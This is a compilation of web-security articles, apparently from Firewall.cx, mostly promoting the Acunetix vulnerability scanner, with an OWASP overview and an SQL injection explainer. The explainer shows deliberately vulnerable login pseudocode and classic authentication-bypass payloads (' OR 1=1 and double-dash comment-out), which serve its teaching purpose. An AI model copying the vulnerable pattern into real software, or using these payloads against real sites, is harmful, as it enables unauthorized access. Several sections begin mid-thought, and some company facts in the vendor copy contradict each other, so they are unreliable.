Acunetix, the pioneer in automated web application security software, has announced the release of Acunetix Version 13. The new release comes with an improved user interface and introduces innovations such as the SmartScan engine, malware detection functionality, comprehensive network scanning, proof-of-exploit, incremental scanning, and more. This release further strengthens the leading position of Acunetix on the web security market.

“Acunetix has always focused on performance and accuracy and the newest release is yet another proof of this,” said Nicolas Sciberras, CTO. “You cannot find these unique features in any other product.”

Unparalleled Performance

Scanning complex web applications using traditional web vulnerability scanners may take hours, having a serious impact on production site performance and internal processes. Acunetix addresses this problem by introducing even more innovations that improve scanning performance.

The SmartScan engine included with Acunetix v13 prioritizes unique pages to discover more vulnerabilities early on. In most cases, Acunetix SmartScan can find approximately 80 percent of vulnerabilities in the first 20 percent of the scan. The newest Acunetix engine also reduces the number of requests required to find vulnerabilities, which lessens the site load during the scan.

In addition to the SmartScan engine, the newest Acunetix release also introduces incremental scanning. You can choose to scan only the elements of your web application that have changed since the last full scan. On average, it shortens the process by 90 percent or more.

Comprehensive Security Coverage

With the release of Acunetix v13, network scanning functionality is now available on all platforms. Web vulnerabilities and network vulnerabilities are part of the same assessment and management processes.

In addition to the previously available malicious link discovery function, the newest Acunetix release also introduces web malware scanning. Acunetix discovers scripts on websites and web applications, downloads them, and scans them locally using Windows Defender on Windows or ClamAV on Linux.

Further Advances In Automation

Acunetix v13 introduces two new features that greatly improve automation, especially in the case of larger organizations. The vulnerability confidence level clearly indicates whether the vulnerability may need further manual confirmation. Critical vulnerabilities typically have a 100 percent confidence level, which means that they are fully verified. For most such vulnerabilities, Acunetix now also provides a proof-of-exploit, such as the content of a sensitive file downloaded from the server.

The newest release also enhances the import and integration capabilities of Acunetix. The scanner can now additionally import WADL, ASP.Net WebForms, and Postman files to seed the crawl. You can also export vulnerabilities to even more issue trackers: GitLab, Bugzilla, and Mantis.

Technology Improvements

With all the new advances comes an improved user interface, featuring better sorting and filtering as well as response highlighting and improved accessibility.

In addition to the above innovations and improvements, the Java AcuSensor technology now supports the Spring framework, while the DeepScan crawling engine can now directly recognize Angular 2, Vue, and React frameworks and adjust crawling to their requirements.

Acunetix, The Company

Founded in 2005 to combat the alarming rise in web application attacks, Acunetix is a pioneer and market leader in automated web application security technology. Acunetix products are trusted globally by individual security experts, SMBs, and large organizations. It is the security provider of choice for many customers in the government, military, educational, telecommunications, banking, finance, and e-commerce sectors, including the Pentagon and Fortune 500 companies such as Nike, Disney, and Adobe.

SQL injection vulnerabilities

However, SQL vulnerabilities are also easy to discover automatically using web vulnerability scanners. Advanced web security scanning software can detect even the more advanced type of SQL injections such as blind SQL injections. SQL injections are also easy to fix and avoid. Developers can use parameterized queries (prepared statements) or stored procedures to avoid the root cause of SQL injections, which is the direct use of untrusted user input in SQL queries.

In this article, we will show you how to scan your web applications for SQL injections using the latest version of Acunetix. The scan will be performed on the VulnWeb site by Acunetix, which is intentionally vulnerable to attacks. The article assumes that you have downloaded and installed the Acunetix demo.

Key Topics:

• Step 1 – Creating a Scan Target
• Step 2 – Performing a Scan
• Step 3 – Interpreting Results
• Summary

Related Articles

• Everything You Need to Know About SQL Injection Attacks & Types, SQLi Code Example, Variations, Vulnerabilities & More
• What is Cross-site Scripting (XSS)? Why XSS is a Threat, how does XSS Work? Different Types of XSS Attacks
• Creating a Cross-site Scripting (XSS) Attack. Understanding How XSS Attacks Work & Identifying Web Vulnerabilities

STEP 1: CREATING A SCAN TARGET

To begin testing your web application for SQL injections, you need to add your web application URL as the target.

1.  Click on the Targets icon in the menu on the left. The Targets pane is displayed.

2. Click on the Add Target button. The Add Target dialog is displayed. In the Address field, enter the full URL of your web application. Optionally, in the Description field, enter a human-readable description of your target:

3. Click on the Add Target button in the Add Target dialog. The Target Info pane is displayed:

4. In the Target Info pane, you can configure additional properties of the target. For example, you may choose to use AcuSensor technology, which requires that you install the AcuSensor agent on your web server. We recommend that you use this technology to increase the precision of your scanning.

STEP 2: PERFORMING A SCAN

Once your target is added and configured, you can scan it whenever you need to. You can also schedule your scans for the future. There are different types of scans, depending on your current needs. In this article, we will perform an SQL injection scan.

5.  Click on the Scan button in the Target Info pane. You can also click on the Scans icon in the left-hand menu to open the Scans pane, select the target by clicking on the leftmost column, and click on the New Scan button. The scan is started. You can see the progress of the scan in the Activity section:

6. When the scan is finished, a Completed icon will be visible in the Activity section:

STEP 3: INTERPRETING RESULTS

When the scan is completed, you can analyze the details of the discovered vulnerabilities so that you know how to eliminate them. Acunetix provides additional information about all vulnerabilities as well as helpful links that teach you how to fix the issue.

7. To see the details of vulnerabilities discovered during the scan, click on the Vulnerabilities tab. You can also click on the Vulnerabilities icon in the left-hand menu to see vulnerabilities for all targets at the same time:

8. To see the details of a selected vulnerability, click on the row in the table that represents the vulnerability. The vulnerability details panel is displayed:

As you can see above, Acunetix provides exact details of the payload and the resulting SQL query. Since AcuSensor technology was used, the report also shows the source file and the line of code causing the SQL Injection vulnerability.

Summary

This article showed how to detect SQL Injection Vulnerabilities on your website, web application and CMS system. We saw how easy and quickly the Acunetix Web Vulnerability Scanner can be used to scan and obtain a full report of all SQL Injection vulnerabilities and exploits your systems are susceptible to.

Fortunately, not all hackers have nefarious intentions. The open source community is full with experts who are looking to warn people about threats and find the most effective ways to keep data safe. Many of those experts are a part of the Open Web Application Security Project (OWASP).

In this article, we'll cover the basics of OWASP and the critical role this work plays in the everyday operation of computers, servers, and other forms of modern technology. Topics covered include:

• What is OWASP? Introduction to Open Web Application Security Project
• Importance of Vendor Neutrality (OWASP)
• Why Web Application Security Matters
• The OWASP Top 10 List
• Accessing Digital Resources Securely
• Summary

What Is OWASP? Introduction To Open Web Application Security Project

OWASP was originally founded in 2001 by Mark Curphey and is run as a not-for-profit organization in the United States. The bulk of its contributors are pulled from the open-source community. Today, more than 32,000 people volunteer as part of OWASP's efforts, with much of their communication coming through message boards or email distribution lists.

The organization is designed to be an unbiased group focused on the best interests of the technology world as a whole. They will not promote specific vendor products or solutions. Instead, OWASP aims to provide practical information to organizations all across the world, with the goal of offering helpful security advice to bring about more informed decisions.

Where OWASP becomes particularly valuable is too small and medium-sized businesses that may not have a large IT budget and lack expertise when it comes to cybersecurity. Thanks to the documentation that OWASP creates, these types of organizations can gain a better understanding of where their systems are vulnerable and how to protect themselves better.

If you’ve heard of OWASP, it’s likely been in conjunction with a report they update every few years known as the OWASP Top 10. The list covers the most relevant cybersecurity threats facing the global community. Later in this article, we'll dive into some of the specifics referenced in the Top 10.

Importance of Vendor Neutrality (OWASP)

The OWASP community is firm about never endorsing specific products or services related to cybersecurity. This might seem counterintuitive. A company needs to make investments in certain tools if they hope to protect their digital assets. And knowing what vendors to trust is important.

However, the purpose of OWASP is to draw attention to the largest security threats we are facing today. If they were to accept advertising or payments for endorsements, then they would lose their impartial status and reliability. You would not know whether they were recommending a security tool because it was actually the best or because someone was paying them to say so.

In a perfect world, all security vendors would produce products and services that function as intended, whether they are developing virus scanners, malware detectors, or software firewalls. But the dirty underbelly of the industry is inhabited by the cybercriminals who try to disguise their attacks within security tools that are designed to look legitimate.

There is no perfect vulnerability security tool or solution, which is why OWASP avoids picking certain products to recommend. The members of OWASP want to highlight security risks to inspire organizations to go out and find a solution that works best for them.

Members of OWASP have a strict set of rules when it comes to dealing with vendors. There are not allowed to seek sales pitches or participate in a technology talk sponsored by a brand. No materials should be distributed in OWASP mailing lists that focus on particular vendors or products.

Why Web Application Security Matters

Organizations with unimpressive IT budgets may be tempted to minimize how much they spend on security-related tools, activities, and training due to the challenge to mathematically determine what the return on investment (ROI) will be. If one thing is certain, it’s that management will want to know the ROI and when cyber-attacks are in play, coming up with an accurate representation of how much a successful penetration could have cost is, well, not easy.

But lowering the priority of cybersecurity protection is dangerous. Instead, you need to treat it like you would car insurance or health insurance. Everyone likes to think that they won't get into a car accident or have to go to the hospital, but insurance is there to cover you for unexpected incidents.

With IT security tools, you typically purchase a solution entirely or else pay for a subscription on a monthly basis. In either case, you spend money up front to avoid disaster for your entire organization. The point is to protect yourself from attacks before you even know you are being targeted.

Cybercriminals obsessively spend their lives looking for system vulnerabilities that can expose data or bring down entire servers. Usually, money is the primary objective, with the attackers seeking to sell stolen data on the dark web for profit. In some cases though, the attack is meant purely to destroy a company's reputation or ability to operate.

The goal of OWASP is to track the most common tactics that hackers utilize and identify what sort of protection is required to defend against them. New vulnerabilities are discovered every day, so that's why it's critical to maintain cybersecurity as an active part of your organization's operations. Buying a set of security tools is not enough. You need to keep those up to date and watch for new types of attacks that demand new types of solutions.

The OWASP Top 10 List

OWASP Top 10 List

As mentioned before, OWASP is best known for the Top 10 List of security vulnerabilities that they revise and publish regularly. The latest version is from 2017 and remains applicable today. The Top 10 List documentation includes an explanation of each risk as well as diagrams and prevention tips.

SQL Injection Attacks

Many of the threats on the Top 10 List are targeted at software developers who write code and may discover these types of security flaws during the course of their work. For example, the first risk listed is concerns database injections for SQL and other platforms. Hackers have used injection vulnerabilities for years to manipulate front-end inputs like search fields to retrieve or edit data that should be inaccessible to them.

Cross-Site Scripting Attacks

Another major code-based risk is cross-site scripting (XSS) attacks, where a cybercriminal will find a way to execute JavaScript or HTML on a remote webpage. Often, they will redirect users to a rogue URL where they try to steal personal information or financial data.

Best of the Rest

Some of the other items on the Top 10 List exist at a lower level of coding. For example, there are software libraries and frameworks that have known vulnerabilities that hackers can exploit. If your organization uses software that requires such an asset, then you should consider it to be at risk until it is patched.

But even if your coding standards are strict and secure, there are still risks that exist at a system or network level. Sensitive data exposure is included in OWASP's Top 10 List, as major data breaches have become a regular occurrence among businesses of all sizes and within all industries.

Accessing Digital Resources Securely

Obviously, OWASP is a huge fan of impressing upon organizations the critical need for internal and external users to only access digital resources securely. There are a variety of ways to accomplish this, not limited to:

1. Forget the old advice that an eight character password is good enough. Modern password managers allow you to create incomprehensibly complex codes that run to 12 or 16 characters or longer.
2. Think before you click. As social engineering scams have moved online, every member of your company needs to be educated to be suspicious of every link because a nasty bit of malware could be hiding on the other end.
3. Use a virtual private network (VPN) in conjunction with your regular ISP. The cost is modest and it allows you to apply military-grade encryption to your data flow every time you go online. Another VPN benefit is that you receive a new anonymous IP address that makes it difficult for a bad guy to determine exactly where you are.
4. Back up - as in backup your network regularly. There’s a decent chance a hacker will eventually be successful. At that point, your best defense is to be able to roll back the network to a previous point in history before the malware got in.
5. Multi-Factor Authentication (MFA). MFA is quickly becoming an industry standard requiring users to verify their identity using additional means other than their password. Usually, the second authentication is a One-Time-Password (OTP) or a Push notification-verification via an application installed on the users’ phone.

There are hundreds of other preventative measures to take to keep your system safe but these four will get you a long way down the road while you get up to speed on all the security education OWASP has to offer.

Summary

Before you jump to purchasing costly solutions from vendors to cover each scenario on the OWASP Top 10 list, remember that a huge part of cybersecurity is awareness and education. Members of your organization should attend training on a regular basis to understand what risks exist for them both as users and system owners.

Following the lead of the OWASP community can help your company maintain a strong reputation. If your cybersecurity efforts are working properly, they should be invisible to people inside and outside of your organizations. Problems begin when a hacker manages to compromise your systems, leaving your digital assets and customers at risk.

The application is tested from the outside with no access to the source code or the web server. Static Application Security Testing (SAST), also called white box testing, imitates a code reviewer. The application source code is analyzed from the inside.

Before we dive deeper into these interesting web application testing and vulnerability scanning technologies, let's take a quick look at what's covered:

• Analyzing Dynamic Security (DAST) & Static Application Security Testing SAST) Mechanisims
• Interactive Application Security Testing (IAST)
• Web Application Vulnerability Scanning - Automation to the Rescue
• Where's the Catch? Supporting PHP, Java and .NET

Analyzing Dynamic Security & Static Application Security Testing

Both of these methods have lots of advantages. The DAST approach is very practical and has huge coverage. You can run a black box test on an application written even in the most exotic technology or language. Its coverage is even bigger because detected vulnerabilities can be caused for example by bad configuration and not by mistakes in the source code.

On the other hand, SAST can let you discover some things that are not obvious when seen from the outside. For example, additional URLs or parameters. With white box testing, you also know immediately where the problem is located in the source code so it speeds up fixing.

IAST provides precision web vulnerability scanning

Imagine how effective a security scan can be if you were to join the two methods together! And no, this is not just theory, it actually exists. The merger of these two approaches is called Interactive Application Security Testing (IAST) or gray box testing and is available for example in Acunetix (thanks to its AcuSensor technology).

What Can You Do with IAST?

A gray box testing solution adds hooks around key calls (for example, database calls, system calls, etc.). Those hooks, often called sensors, communicate two ways with the IAST scanner. Hooks do not require access to the source code. The scanner works directly with the interpreter or the application server.

Sensors provide additional information about the calls. In addition, they can provide a full site map from the point of view of the web server. For example, a standalone DAST scanner would not be able to find a URL or a URL parameter that is not linked to or in some way announced by the application. However, with a full site map, the IAST scanner can attempt to test the unannounced URLs/parameters.

Some security flaws may also be caused by bad configuration. This is another activity in which an IAST scanner can excel. Sensors can help to find security errors in interpreter/compiler configuration files and provide the scanner with additional information to attempt attacks based on these configuration properties.

Last but not least, these two methods together can have a significant impact on the reduction of false positives! For example, when you run a time-based blind vulnerability test with a DAST scanner, the scanner may only guess that a time delay is caused by a vulnerability (for example, an SQL server processing a sleep command). When you have a sensor that is monitoring what is going on server-side, you can be one hundred percent sure what causes the time delay.

Web Application Vulnerability Scanning - Automation To The Rescue

Using a sensor requires no additional work from developers. The IAST scanner uses clever tricks to intercept calls. When it is working with an interpreter, it listens in on the communication between the interpreter and the web server. It analyzes this communication, finds all the potentially risky calls, and uses even more clever tricks to modify calls on the fly by adding hooks. When it is working with a bytecode compiler, it taps the communication with the application server.

IAST may make developer work even easier. If you use a DAST scanner and find a vulnerability, the developer always needs to go through the source code to identify the location of the security issue. But in some cases, a sensor may be able to pinpoint the root cause of the vulnerability and show you the line of code or give you a stack trace.

Where’s the Catch? Supporting PHP, Java and .NET

Gray box testing looks too good to be true. The only problem is its coverage. Just like SAST scanners, IAST works only with specific programming languages and environments. At the moment, AcuSensor supports PHP, Java, and .NET. However, taking into consideration that according to W3Techs surveys these three technologies together cover 94.4% of the landscape, this should not be much of a concern for most.

The extensive report has been compiled from scans performed from more than 10,000 targets and reveals some very interesting results about today's security threats and the percentage of organizations that correctly deal with their vulnerable web applications and exploits. From SQL Injection vulnerabilities to Cross-Site-Scripting (XSS) vulnerabilities, popular CMS platform vulnerabilities to remediation steps and more.

Here are some of the report's highlights that will surely interest every IT security professional and web application developer: 

• 46% of websites scanned contained high severity vulnerabilities
• 87% of websites contained medium severity vulnerabilities
• SQL Injection vulnerabilities have declined slightly
• 30% of websites contained Cross-Site-Scripting (XSS) vulnerabilities
• 30% of websites had vulnerable JavaScript Libraries
• 30% of websites were WordPress sites with a number of vulnerabilities

The report is a great opportunity for professionals to learn more about the latest and greatest vulnerabilities circling the web and proactively take measures to ensure their own websites and web applications are properly tested and patched against popular vulnerabilities and attacks.

Here’s vital security information the 2019 Web Application Vulnerability Report contains:

• Vulnerabilities that are rising and falling in frequency
• Vulnerability findings by type and severity
• Changes in the threat landscape from both clients and server sides
• The four major stages of vulnerability analysis
• Detailed analysis of each discovered vulnerability – how it works, pointers and remediation steps
• Current security concerns – increasing complexity of new applications, accelerating rate of new versions and the problem of scale
• Vulnerabilities that are major to the security of all organizations, regardless of their size and location.
• Plenty of useful information and advice aimed for network security professionals, web application developers, IT Managers, security auditors, application architects and more.

The 2019 Web Application Vulnerability Report is used by leading security professionals and web application developers to help understand how to protect network and applications for the latest security threats and web vulnerabilities.

As web applications scale, manual security assessments can become time-consuming and challenging to process while outsourcing these tasks won’t always provide the desired result. In many cases, a degree of automation is the way forward, and the decision becomes which web vulnerability scanner to choose.

Firewall.cx has written extensively about the pros of web vulnerability scanners, popular tools, and good common security practices. Despite this, we keep coming back to Acunetix, and it recently received a major upgrade. Version 12 of the enterprise-grade security tool is a significant leap forward that deserves an in-depth assessment.

Founded in 2005, Acunetix was designed to replicate hackers, yet catch vulnerabilities before they do. The leaps and bounds since its release have led to use in government, military, and banking, as well as partnership with Microsoft and AWS.

Before we dive in our in-depth analysis let’s take a look at the topics covered:

• Installation and Using Acunetix 12 Enterprise
• Scanning Web Applications and Websites with Acunetix 12 Enterprise
• AcuSensor – Achieving 100% High-Severity Vulnerability Accuracy
• Acunetix Reporting, Exporting, and Issue Tracking
• Conclusion

Installing and Using Acunetix 12 Enterprise

When it comes to sheet usability, it’s easy to see why. While most readers will have no problems with complex setups, it’s always nice to avoid the hassle. Acunetix’s installation is a matter of creating an admin account, entering the license key, and choosing a port.

All told, it took a matter of minutes to get up and running and didn’t require any additional configuration or restarts. For Enterprise customers, multi-engine deployment is also available, allowing for more simultaneous scans. As you’d expect, the setup is a little more complex, but still only requires a single line in command prompt and some additional registration inside Acunetix. Once configured, users can set targets to only scan with a specific engine and can push past the normal limit of 25 simultaneous scans.

However, many organizations will still want to setup user accounts for different roles. The software has three different account types for Tech Admins, Testers, and Auditors:

Adding additional users is possible via a tab in the settings menu, with an email and secure password with special characters required. After selecting a role, the admin can decide whether to give users access to all targets or add them to a specific target group at a later date.

Standard licenses are limited to one user, but Enterprise and Online plans can make an unlimited number, all with separate roles and targets. For additional security, admins can enable two-factor authentication, enforce password changes, and specify the amount of login failures before lockout.

Scanning Web Applications and Websites with Acunetix 12 Enterprise

After installation, Acunetix’s web portal opens in the default browser. Users are taken to the dashboard, which reveals the number of open vulnerabilities discovered, websites scanned, and most common vulnerabilities.

Click to enlarge

Users are able to click on the High, Medium, and be taken straight to the Vulnerabilities section for a detailed breakdown. They can click through to specific websites, vulnerability types, and active/waiting scans. It’s a fairly comprehensive overview, and it gets more interesting when you hit the show trends button.

Here, Acunetix gives some long-term metrics. Line graphs show the number of open vulnerabilities in a 12-month period, the average number of days to remediate issues, issues over time, and more.

However, though the dashboard presents a nice overview, core functionality is found under the Targets heading. Users are able to click the Add Target button and enter and website or application URL with a description for easy identification.

Acunetix then presents you with a number of options, separated into General, Crawl, HTTP, and Advanced tabs. The general tab lets you specify the business criticality of the target, which helps to prioritize the vulnerabilities it detects. You can also set the speed of the scan and choose to scan continuously to monitor the progress long-term. If a scan is taking too long, you can pause it and continue at a later date.

With advanced options, you can specify the languages to scan, add custom headers and cookies, and specify allowed hosts. There’s also the ability to import files for the crawler, such as URL lists and Fiddler Proxy Export. You can even craft custom scan types to look for recently disclosed vulnerabilities.

The search section also houses the site login option, which gives the app access to restricted areas for better scanning.  In most cases, Acunetix can login to the site automatically, but there’s also an option to record your login sequences via a dedicated sequence wizard.

It seems Acunetix has thought of pretty much everything here, and a scan of known test sites revealed many types of issues. It was adept and discovering several instances of cross-site scripting, as well as expression language injection and DOM-based XSS.

Importantly, though, it was also able to find issues that weren’t as critical. Medium severity issues such as Apache httpOnly cookie disclosure, HTML injection, vulnerable Javascript libraries and more were all discovered. Acuentix has made several improvements to their scan times, and we found scans to take no more than 15 minutes even on large sites and with a slow connection.

As mentioned earlier, you can drill down into specific vulnerabilities for more information. A page will give an explanation of the vulnerability, the details of the attack, HTTP requests, and impact. Critically, there’s also information about how to fix the issue, as well as a CWE link and CVSS information. Once reviewed, you can mark them as fixed, ignored, or false positive.

You’re also able to look at vulnerabilities from a site vulnerability perspective, looking at the status of individual files and the specific parameters within them.

AcuSensor – Achieving 100% High-Severity Vulnerability Accuracy

Despite all this, Acunetix emphasises that its users will get better results with the use of AcuSensor. The AcuSensor agent is available for installation on the website in PHP, .NET, and Java form, and improves the accuracy of the scan with better crawling and detection, and well as a decrease in false positives. The company promises a 100% high-severity vulnerability accuracy and detection of a larger range of SQL injection issues.

The tool also gives line-of-code information for PHP applications and stack traces for ASP.NET and Java, as well as example SQL queries for injections. This makes it a very powerful offering, though it isn’t recommended for production environments.

Via a Jenkins plugin, the Enterprise variant can also be implemented in continuous integration processes. Jenkins can automatically trigger scans and reports with each build, creating both PDF Acunetix versions and an HTML Jenkins one. It can also fail builds if a certain threat level is reached. There’s a REST API for other integrations, with up-to-the-minute status of ongoing scans, vulnerability details, and more.

Acunetix Reporting, Exporting, and Issue Tracking

Once a scan is complete, users have several options of how to proceed. A strong point of Acunetix is its support for a number of Web Application Firewalls. The software’s WAF Export option supports a number of major solutions, including F5, Imperva, and Fortinet. For others, there’s the choice to export as a regular XML, but that’s only available if you export a full scan. For specific vulnerabilities, you’ll have to use one of the other formats.

Perhaps more useful is the ability to send vulnerabilities to an issue tracker, though it does have to be configured first. After finding the option, you add GitHub login details and selecting the relevant project. There’s the option to specify an issue type, as well as validate the connection before exiting.

You then have to set up the tracker to with every site by heading back to Targets menu and changing the advanced option. It’s a little clunky to add the option retroactively, but it gets the job done.

In Firewall.cx’s testing, the issues pushed to GitHub near-instantly, with relevant labels and all of the information provided. That includes the target URL, severity, attack details, HTTP requests, impact, remediation suggestions, and references. It all works with a single button press and we have no doubt this will greatly speed up workflows.

Similar functionality exists for JIRA and Microsoft TFS, though JIRA currently has a limit of 20 issue tracker items. It’s generally smart during the process, refusing to open duplicate issues for the most part.

Overall, the issue tracker capabilities are quite impressive and intuitive, but there are options for traditional reporting if your organization requires it. There a number of standard templates, but also a total of ten different compliance templates, which is extremely useful.

Reports are available in PDF or HTML for CWE 2011, HIPAA, ISO 27001, OWASP, and more. Each starts with an explanation and continues with a category-by-category breakdown with the number of alerts and information about each.

There’s no real room for customisation here, but there’s little need for it. Everything you’d expect is covered, and displayed in a logical, if not particularly pretty way. Reports generate quickly in the background and can be produced on a per-scan, per-target, or bulk basis.

Conclusion

Firewall.cx first began its journey with Acunetix began almost 12 years ago with its standalone Windows 98 program. The distance the web vulnerability scanner has come since then is truly immeasurable, managing to keep up with the competition as other companies have faded into the background.

The product sports a minimal and modern UI, but its results aren’t to be scoffed at, being the only one to net out-of-band vulnerabilities. Its long time in the industry has allowed it to think of pretty much everything, with no major drawbacks to speak of and new integrations in the works. Though report design is average, the number of templates is higher than usual, and many will lean on its issue tracker support.

Thanks to Acunetix Enterprise v12, organizations are now able to scan in-house, third-party and cloud-based web applications or websites for security vulnerabilities such as SQL injections, Cross-Site Scripting attacks, hundreds of other security flaws, and take corrective action. Developers can automate vulnerability assessments in their processes, achieve 100% high-severity vulnerability accuracy thanks to AcuSensor and detect of a larger range of SQL injection issues. Compliance reports can be generated to suite CWE 2011, HIPAA, ISO 27001, OWASP standards and much more.

Despite this significant feature set, it remains affordable to all ogranizations and is well worth looking into. An Enterprise Plus plan also available, offering over 20 targets at a variable price.

22nd May 2018

“Acunetix was always in the forefront when it came to accuracy and speed, however now with the re-engineered scanning engine and sensors that support the latest JavaScript and Java technologies, we are seeing websites scanned up to 2x faster without any compromise on accuracy.” announced Nicholas Sciberras, CTO.

A free trial version can be downloaded from: http://www.acunetix.com/vulnerability-scanner/download/

Support For Latest JavaScript

Acunetix DeepScan and the Acunetix Login Sequence Recorder have been updated to support ECMAScript version 6 (ES6) and ECMAScript version 7 (ES7). This allows Acunetix to better analyse JavaScript-rich sites which make use of the latest JavaScript features. The modularity of the new Acunetix architecture also makes it much easier now for the technology to stay ahead of the industry curve.

AcuSensor For Java

Acunetix version 12 includes a new AcuSensor for Java web applications. This improves the coverage of the web site and the detection of web vulnerabilities, decreases false positives and provides more information on the vulnerabilities identified. While already supporting PHP and ASP .NET, the introduction of Java support in AcuSensor means that Acunetix coverage for interactive gray box scanning of web applications is now possibly the widest in the industry.

Speed & Efficiency With Multi-Engine

Combining the fastest scanning engine with the ability to scan multiple sites at a time, in a multi-engine environment, allows users to scan thousands of sites in the least time possible. The Acunetix Multi-engine setup is suitable for Enterprise customers who need to scan more than 10 websites or web applications at the same time. This can be achieved by installing one Main Installation and multiple Scanning Engines, all managed from a central console.

Pause / Resume Feature

Acunetix Version 12 allows the user to pause a Scan and Resume the scan at a later stage. Acunetix will proceed with the scan from where it had left off. There is no need to save any scan state files or similiar - the information about the paused scan is automatically retained in Acunetix.

About Acunetix

User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry leading crawler fully supports HTML5 and JavaScript and AJAX-heavy websites, allowing auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on premise solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality.

Acunetix, The Company

Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe  and many more.

SQL Injection Attacks

This article aims to help network engineers, administrators, security experts and IT professionals understand what an SQL injection is by taking you step-by-step on how an HTTP SQL injection attack is executed using real code. 

Here is a list of topics we’ll cover:

• SQL Injection Attacks – Basics
• Example of an SQL Injection Vulnerability
• Exploiting SQL Injection Vulnerabilities
• Variations of SQL Injection Attacks
• In-Band SQL Injection
• Blind SQL Injection
• Out-of-Band SQL Injection
• Summary

Additional related articles:

• What is Cross-site Scripting (XSS)? How does XSS Work? Different Types of XSS Attacks

• Understanding, Avoiding & Protecting Against Cross Site Request Forgery Attacks

• Automate Web Application Security - Why, How & The Necessary Tools

• Creating a Cross-site Scripting (XSS) Attack. Understanding How XSS Attacks Work & Identifying Web Vulnerabilities

SQL Injection Attacks - Basics

SQL Injection, or SQLi for short, refers to an attack vector that exploits a web application by abusing the inherent trust between the web application and the database. An SQL injection attack would allow an attacker to perform malicious actions on the database through the use of specially crafted SQL commands. SQL is the most commonly used database query language, making it ideal for an attacker to target.

Since SQL Injection attacks can be performed against a wide array of applications, this attack is one of the most widely common and most critical of web vulnerabilities. So much so that injection attacks, such as SQL Injection, have placed first in OWASP’s Top 10 list,  several times in a row.

SQL Injection attacks can allow an attacker to extract, modify, add and delete data from a database, in turn affecting data confidentiality, integrity and availability (since an attacker could potentially delete data and disrupt operations). In addition, an SQL Injection attack can be used as a springboard to escalate the attack.

Example of an SQL Injection Vulnerability

A web application would typically communicate with a variety of back-end systems, including a database. Let’s take an HTML form, which inserts values into a database, as an example. 

Once the form is filled out and submitted, an HTTP request (usually a POST request) is sent to the web application, where the input values are directly included into the SQL statement that will insert these values into the database. 

The only way an SQL Injection vulnerability could occur is if the web application trusts the user’s input without parameterizing it and using prepared statements. This is done by instructing the database that a certain part of the query should be executed while the rest is to be treated as the user’s input. 

Prepared statements ensure that the database does not interpret certain characters in the user’s input as part of the SQL statement, therefore allowing the attacker to submit their own SQL statements.

SQL Injection example: The following pseudo code is a simple example showing how a user can be authenticated:

// Get username and password from POST request
username = request.post['username']
password = request.post['password']

// Statement vulnerable to SQL injection
sql = “SELECT id FROM users WHERE username=’” + username + “’ AND password=’” + password + “’”

// SQL statement executed by database
db.exec(sql)

If the user inputs foo as the username and bar as the password, the following SQL statement will be processed by the database server:

SELECT id FROM users WHERE username=’foo’ AND password=’bar’

When executed, as expected, this will return the value of the ID column that is associated with the database entry of the corresponding username and password.

Exploiting SQL Injection Vulnerabilities 

The example above is vulnerable to SQL Injection, since whatever the user inputs in the form will be interpreted by the database server as a command. For instance, an attacker could bypass this form by setting the password field to ’ OR 1=1

The following is what the SQL statement would look like.

SELECT id FROM users WHERE username=’foo’ AND password=’pass’ OR 1=1

From the above statement we can see that the user’s input has changed the statement’s functionality. Now, the value of the ID column is being returned if the submitted username is equal to foo, and password is equal to pass, or if 1is equal to 1 (which will always be the case).

With this statement only the username needs to match the value in the database because, for the password condition to be met, the submitted password can either match the value in the database or it can be validated if 1=1. With this trick, the attacker can bypass the website’s authentication mechanism for any user whose username is known. 

To further control the SQL statement, an attacker can even comment out the rest of the statement. For example, an attacker can use the double-dash (--) notation to comment out the rest of the statement:

SELECT id FROM users WHERE username=’username’ --’ AND password=’bar’

The highlighted part of the above statement, or anything after the double-dash, will be commented out and therefore not considered during execution. This will once again allow an attacker to bypass authentication. 

Variations of SQL Injection Attacks

It is important to note that there are three major classifications of SQL Injection attacks, each of which has its own particular use and can only be used under a specific circumstance. These categories are:

In-Band SQL Injection

The example that we saw earlier was an in-band attack since the same channel was used to launch the attack and obtain the result which, in this case, was being authenticated. In-band attacks are the most common and easiest to exploit in comparison to other SQL injection attacks. 

Data exfiltration using in-band attacks can either be done through error messages that are reported on the web application triggered by an SQL Injection attack or by using the UNION operator thereby allowing an attacker to insert their own SQL statements. 

Blind SQL Injection

Blind or Inferential SQL Injection attacks may take longer to execute, since the only response returned is in the form of a boolean. The attacker can exploit this to make requests and identify differences in the response being returned, which will confirm if the requests sent had a true or false result and then reconstruct the database structure and data.

Content based attacks focus on the response being returned, such as an HTTP response status code or the response data itself. On the other hand, time based attacks measure delays in the response being sent by the server where, for example, a ten second delay may confirm that the request returned a true result, while no delay means that the result was false. 

Out-of-Band SQL Injection

Out-of-Band attacks are the least common of the SQLi attacks and generally the most difficult to execute because the attack requires that the server hosting the database will communicate with the attacker’s infrastructure. This attack would normally be used if the channel through which the requests are being made is not consistent or stable enough for an in-band or blind SQLi attack to succeed. 

Summary

SQL Injection attacks require that the web application passes an attacker’s input to the database without making use of prepared SQL statements. Exploiting an SQL Injection vulnerability can, potentially, even allow an attacker to gain access to resources that are only reachable on local networks.

Since SQL Injection has been around since 1998 it is widely understood and easily exploitable using free and readily available tools. Most development frameworks have protection mechanisms built in that assist web developers to produce web applications that are not prone to SQL Injection attacks.

This goes to show that preventing SQL Injection vulnerabilities has become a necessity. Manually testing each form and parameter does not work well, which is why it makes sense to automate web application security testing with a tool such as Acunetix, which will not only find instances of SQL Injection but also other known vulnerabilities.

Simpler, Cleaner User Interface

Acunetix Online’s new user interface has been re-designed from the ground-up to bring it inline with Acunetix On Premise. The Acunetix Online user interface has been simplified whilst being made more useful by focusing on the product’s core functionality by introducing filtering options, and improving manageability of Targets. Features include:

• Targets, Scans, Vulnerabilities and Reports can all be filtered to find exactly what you are looking for quickly.
• Excluded Hours, Excluded Paths, custom User Agent strings, client certificates and many more configuration options previously only available to Acunetix On Premise customers are now also available in Acunetix Online.
